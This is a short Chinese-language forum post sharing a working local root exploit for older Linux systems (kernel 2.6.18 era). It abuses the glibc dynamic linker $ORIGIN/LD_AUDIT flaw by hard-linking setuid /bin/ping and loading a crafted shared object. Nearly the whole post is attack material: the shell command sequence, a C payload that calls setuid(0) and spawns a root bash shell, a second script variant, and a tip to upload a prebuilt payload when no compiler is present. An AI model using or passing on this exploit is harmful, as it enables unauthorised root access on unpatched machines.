exp,对部分2.6.18*的有用
应该是2010年出的吧,可能有部分同学那时没有注意到,此方法可以提低版本的2.6.18*.
2012就不用试了,2011的有时可以成功payload.c当不能gcc时,解压XXX,扔上去试下
2012就不用试了,2011的有时可以成功
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
#!/bin/sh
unset LD_AUDIT
rm -r -f /var/tmp/exploit
mkdir /var/tmp/exploit
ln /bin/ping /var/tmp/exploit/target
exec 3< /var/tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /var/tmp/exploit
ls -l /proc/$$/fd/3
cp xxx /var/tmp/exploit
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT
评论22次
国外类似的好多都不错 http://www.itsecdb.com/oval/ exploitsdownload.com ...
。。。 GNU C library dynamic linker $ORIGIN expansion Vulnerability http://www.exploit-db.com/exploits/15274/